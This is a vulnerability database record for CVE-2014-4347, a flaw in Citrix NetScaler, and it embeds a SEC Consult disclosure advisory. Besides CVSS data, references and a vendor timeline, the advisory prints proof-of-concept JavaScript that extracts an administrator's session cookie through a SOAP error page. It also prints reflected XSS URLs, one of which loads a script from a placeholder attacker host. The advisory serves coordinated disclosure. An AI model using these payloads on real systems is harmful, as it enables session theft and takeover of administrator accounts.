ID

VAR-201407-0464


CVE

CVE-2014-4347


TITLE

Citrix NetScaler Application Delivery Controller and NetScaler Gateway Vulnerability in which important information is obtained

Trust: 0.8

sources: JVNDB: JVNDB-2014-003366

DESCRIPTION

Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway (formerly Access Gateway Enterprise Edition) before 9.3-62.4 and 10.x before 10.1-126.12 allows attackers to obtain sensitive information via vectors related to a cookie. Citrix NetScaler Application Delivery Controller is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory < 20140716-2 > ======================================================================= title: Multiple vulnerabilities product: Citrix NetScaler Application Delivery Controller Citrix NetScaler Gateway vulnerable version: <9.3-62.4 <10.1-126.12 fixed version: >=9.3-62.4 >=10.1-126.12 CVE: CVE-2014-4346, CVE-2014-4347 impact: High homepage: http://www.citrix.com found: 2014-01-05 by: Stefan Viehb\xf6ck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: - ----------------------------- "Citrix NetScaler helps organizations build enterprise cloud networks that embody the characteristics and capabilities that define public cloud services, such as elasticity, expandability and simplicity. NetScaler brings to enterprise IT leaders multiple advanced technologies that were previously available only to large public cloud providers." "As an undisputed leader of service and application delivery, Citrix NetScaler solutions are deployed in thousands of networks around the globe to optimize, secure and control the delivery of all enterprise and cloud services. They deliver 100 percent application availability, application and database server offload, acceleration and advanced attack protection. Deployed directly in front of web and database servers, NetScaler solutions combine high-speed load balancing and content switching, http compression, content caching, SSL acceleration, application flow visibility and a powerful application firewall into a single, easy-to-use platform." URL: http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html Business recommendation: - ------------------------ Attackers can exploit XSS and other vulnerabilities that lead to cookie disclosure to execute administrative actions. Affected Systems should be updated as soon as possible. Vulnerability overview/description: - ----------------------------------- 1) Cookie disclosure The error handler in the Apache g_soap module prints all of the request header information including the HTTP Cookie field. 2) Reflected Cross-Site Scripting (XSS) Citrix Netscaler suffers from multiple reflected Cross-Site Scripting vulnerabilities, which allow an attacker to steal user information, impersonate users and perform administrative actions on the appliance. There are many parameters which are not properly sanitized and thus vulnerable to XSS. Proof of concept: - ----------------- 1) Cookie disclosure A GET request to the SOAP handler returns the following information: GET /soap HTTP/1.1 Host: <host> *OTHER HEADER FIELDS* Response: HTTP/1.1 200 OK ... Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> ... <BODY> <H1>mod_gsoap Apache SOAP Server Error</H1> <p><strong>No body received</strong> ... <br>Cookie: SESSID=*SESSION ID*; ... In combination with an XSS vulnerability (see 2) an attacker can use the following code to extract cookies including the SESSID cookie of an administrator: var request = new XMLHttpRequest(); request.open('GET', '/soap', false); request.send(); lines=request.responseText.split('<br>') for (var i in lines){ if (lines[i].indexOf('Cookie')==0){ alert(lines[i]); break; } } 2) Reflected Cross-Site Scripting Accessing the following URL will include the Javascript code from http://evilattacker/evil.js: http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript> Other pages do not sanitize user input properly as well: http://<host>/pcidss/launch_report?type=AA";alert('xss');x=" http://<host>/menu/guiw?nsbrand=AA<"'>AA&protocol=BB<"'>BB&id=CC<"'>CC Note: Content-Type is application/x-java-jnlp-file, so the injected script code is not interpreted. However, it is possible to inject arguments into a Java JNLP file, which might be used in further attacks. Vulnerable / tested versions: - ----------------------------- The vulnerabilities have been verified to exist in Citrix NetScaler VPX 10.0, which was the most recent version at the time of discovery. According to the vendor versions before 10.1-126.12 and 9.3-62.4 are vulnerable Vendor contact timeline: - ------------------------ 2014-01-09: Sending advisory and proof of concept exploit via encrypted channel. 2014-01-17: Vendor acknowledges receipt of advisory. 2014-04-04: Requesting status update. 2014-06-10: Vendor is "in the process of scheduling the release of a security bulletin". 2014-07-07: Requesting list of affected/non-affected versions CVE-IDs. 2014-07-07: Vendors is "still in the final stages of releasing the bulletin". 2014-07-07: Requesting info about cause of delay. 2014-07-07: Vendor is "still hopeful that the bulletin will be available soon". 2014-07-14: Vendor states that fixed version will be available on July 15/16. 2014-07-16: SEC Consult releases coordinated security advisory. Solution: - --------- Update to a more recent version of Citrix NetScaler. More information can be found at: https://support.citrix.com/article/ctx140863 Workaround: - ----------- No workaround available. Advisory URL: - ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehb\xf6ck / @2014 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQEcBAEBAgAGBQJTxmWgAAoJECyFJyAEdlkKWLYH/0wpELCJemzmkj2HaotFZJtt 4C4/hsHWGbxmi2VbeiwGvYKHtDsw2KBDWlTrVTef3UrBnbAv6jFncTCjOv3eU6Ze 9swUmwxzNB9zqGvhYwEpcO8tSQu0H3xDMvbpKqYvq2qaBSm4YmJyUrDlwwSkCUnq ycGqzfidkAXoMUu/6wdam5251zXcR33n1KRfr3AH65p/OoOXrvasgY395Cty9zqW yfBvEIEs845aE/gbjbp40qvroz1dG8Z2LP4ykFWywVme0imgSD6nv/33Z0tDmlcD f7JjK8F7R7Q8l4J54n0iclXCWZhoS3pfabd60NXMzMmxroMuksmiNycm7yLGfe4= =KicK -----END PGP SIGNATURE-----

Trust: 2.07

sources: NVD: CVE-2014-4347 // JVNDB: JVNDB-2014-003366 // BID: 68537 // VULHUB: VHN-72287 // PACKETSTORM: 127496

AFFECTED PRODUCTS

vendor:citrixmodel:netscaler application delivery controllerscope:eqversion:10.1

Trust: 1.6

vendor:citrixmodel:netscaler application delivery controllerscope:eqversion:9.3

Trust: 1.6

vendor:citrixmodel:netscaler access gatewayscope:eqversion:10.1

Trust: 1.6

vendor:citrixmodel:netscaler access gatewayscope:eqversion:9.3

Trust: 1.6

vendor:citrixmodel:netscaler access gatewayscope:eqversion: -

Trust: 1.0

vendor:citrixmodel:netscaler application delivery controllerscope:eqversion: -

Trust: 1.0

vendor:citrixmodel:netscaler application delivery controllerscope:ltversion:10.x

Trust: 0.8

vendor:citrixmodel:netscaler application delivery controllerscope: - version: -

Trust: 0.8

vendor:citrixmodel:netscaler gatewayscope:ltversion:10.x

Trust: 0.8

vendor:citrixmodel:netscaler gatewayscope:eqversion:10.1-126.12

Trust: 0.8

vendor:citrixmodel:netscaler gatewayscope: - version: -

Trust: 0.8

vendor:citrixmodel:netscaler application delivery controllerscope:eqversion:10.1-126.12

Trust: 0.8

sources: JVNDB: JVNDB-2014-003366 // CNNVD: CNNVD-201407-363 // NVD: CVE-2014-4347

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-4347
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-4347
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201407-363
value: MEDIUM

Trust: 0.6

VULHUB: VHN-72287
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-4347
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-72287
severity: MEDIUM
baseScore: 5.0
vectorString: AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-72287 // JVNDB: JVNDB-2014-003366 // CNNVD: CNNVD-201407-363 // NVD: CVE-2014-4347

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.9

sources: VULHUB: VHN-72287 // JVNDB: JVNDB-2014-003366 // NVD: CVE-2014-4347

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-363

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201407-363

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003366

PATCH

title:CTX140863url:http://support.citrix.com/article/CTX140863

Trust: 0.8

sources: JVNDB: JVNDB-2014-003366

EXTERNAL IDS

db:NVDid:CVE-2014-4347

Trust: 2.9

db:SECTRACKid:1030573

Trust: 1.7

db:SECTRACKid:1030572

Trust: 1.7

db:BIDid:68537

Trust: 1.4

db:SECUNIAid:59942

Trust: 1.1

db:JVNDBid:JVNDB-2014-003366

Trust: 0.8

db:CNNVDid:CNNVD-201407-363

Trust: 0.7

db:VULHUBid:VHN-72287

Trust: 0.1

db:PACKETSTORMid:127496

Trust: 0.1

sources: VULHUB: VHN-72287 // BID: 68537 // JVNDB: JVNDB-2014-003366 // PACKETSTORM: 127496 // CNNVD: CNNVD-201407-363 // NVD: CVE-2014-4347

REFERENCES

url:http://support.citrix.com/article/ctx140863

Trust: 1.8

url:http://www.securitytracker.com/id/1030572

Trust: 1.7

url:http://www.securitytracker.com/id/1030573

Trust: 1.7

url:http://www.securityfocus.com/bid/68537

Trust: 1.1

url:http://www.securityfocus.com/archive/1/532802/100/0/threaded

Trust: 1.1

url:http://seclists.org/fulldisclosure/2014/jul/77

Trust: 1.1

url:https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140716-2_citrix_netscaler_multiple_vulnerabilities_v10.txt

Trust: 1.1

url:http://secunia.com/advisories/59942

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/94494

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4347

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4347

Trust: 0.8

url:http://www.citrix.com

Trust: 0.4

url:http://www.citrix.com/products/netscaler-application-delivery-controller/overview.html

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4346

Trust: 0.1

url:http://www.enigmail.net/

Trust: 0.1

url:http://<host>/menu/guiw?nsbrand=aa<"'>aa&protocol=bb<"'>bb&id=cc<"'>cc

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:http://<host>/menu/topn?name=";<%2fscript><script+src%3d"http:%2f%2fevilattacker%2fevil.js"><%2fscript>

Trust: 0.1

url:http://<host>/pcidss/launch_report?type=aa";alert('xss');x="

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-4347

Trust: 0.1

url:https://twitter.com/sec_consult

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:http://evilattacker/evil.js:

Trust: 0.1

url:https://www.sec-consult.com/en/vulnerability-lab/advisories.htm

Trust: 0.1

sources: VULHUB: VHN-72287 // BID: 68537 // JVNDB: JVNDB-2014-003366 // PACKETSTORM: 127496 // CNNVD: CNNVD-201407-363 // NVD: CVE-2014-4347

CREDITS

Stefan Viehböck of SEC Consult

Trust: 0.3

sources: BID: 68537

SOURCES

db:VULHUBid:VHN-72287
db:BIDid:68537
db:JVNDBid:JVNDB-2014-003366
db:PACKETSTORMid:127496
db:CNNVDid:CNNVD-201407-363
db:NVDid:CVE-2014-4347

LAST UPDATE DATE

2024-11-23T22:08:19.562000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-72287date:2018-10-09T00:00:00
db:BIDid:68537date:2014-07-21T00:08:00
db:JVNDBid:JVNDB-2014-003366date:2014-07-17T00:00:00
db:CNNVDid:CNNVD-201407-363date:2014-07-17T00:00:00
db:NVDid:CVE-2014-4347date:2024-11-21T02:10:00.907

SOURCES RELEASE DATE

db:VULHUBid:VHN-72287date:2014-07-16T00:00:00
db:BIDid:68537date:2014-07-15T00:00:00
db:JVNDBid:JVNDB-2014-003366date:2014-07-17T00:00:00
db:PACKETSTORMid:127496date:2014-07-16T22:42:07
db:CNNVDid:CNNVD-201407-363date:2014-07-17T00:00:00
db:NVDid:CVE-2014-4347date:2014-07-16T14:19:04.043